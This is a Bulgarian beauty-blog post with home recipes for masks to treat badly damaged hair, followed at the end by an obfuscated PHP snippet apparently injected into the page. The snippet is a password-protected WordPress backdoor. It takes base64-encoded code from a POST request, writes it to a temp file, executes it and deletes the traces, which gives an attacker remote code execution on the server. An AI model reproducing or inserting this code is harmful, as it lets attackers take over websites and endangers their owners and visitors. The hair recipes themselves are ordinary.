Рецепти при силно увредена и изгорена коса | Косопад

Рецепти при силно увредена и изгорена коса

Косата може да „изгори“ или силно да се увреди поради различни фактори: злоупотреба с боя за коса и други продукти за коса, прекомерно излагане на слънце, морска вода, и др.

maska-s-yaice

Когато казваме, че косата е „изгорена“, това означава, че е изключително суха, къса се, силно изразено цъфтене на връхчетата, липсва блясъка.

Има различни варианти, които можете да опитате, за да се справите с увредената и изгорена коса. Но нека разгледаме няколко домашни рецепти, които са доста ефективни при този проблем.

1. Маска от майонеза, зехтин и яйце. Разбийте добре яйцето. После му добавете 1 с.л. зехтин и 2 с.л. майонеза. Бъркайте, докато сместа стане хомогенна. Нанесете върху косата, сложете си шапка за баня и оставете да действа 20 минути. После измийте обилно с вода, като използвате шампоан и балсам за увредена коса.

kosa-uvrejdane

2. Маска от домат. Измийте си косата, както обикновено. Изцедете сока на два домата и го нанесете върху косата си. Оставете да действа 15 минути и отмийте. Може да сложите и няколко парченца домат в шампоана си.

3. Алое вера, авокадо и глицерин. Чудесна комбинация за увредена и изгорена коса. 3 с.л. лъжици гел от алое вера (изцежда се при разрязване на листата), 3 с.л. растителен глицерин и 2 ч.л. олио от авокадо или 1 с.л. от вътрешността на авокадо. Сложете в чиста и суха бутилка и тръскайте, докато се смесят перфектно. Сложете малко на ръката си и нанесете, най- вече по връхчетата. Покрийте се с шапка за баня и оставете да действа половин час. После измийте с обичайните си продукти. Повтаряйте всеки три дена.

13. юли 2014 17:17:41 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}